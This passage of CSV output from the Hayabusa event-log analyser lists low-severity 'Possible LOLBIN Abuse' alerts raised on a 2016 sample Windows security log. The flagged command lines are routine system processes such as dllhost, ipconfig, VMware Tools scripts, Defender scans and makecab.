LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c 
""""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:47.630 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:54.738 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: 
IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:04.462 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 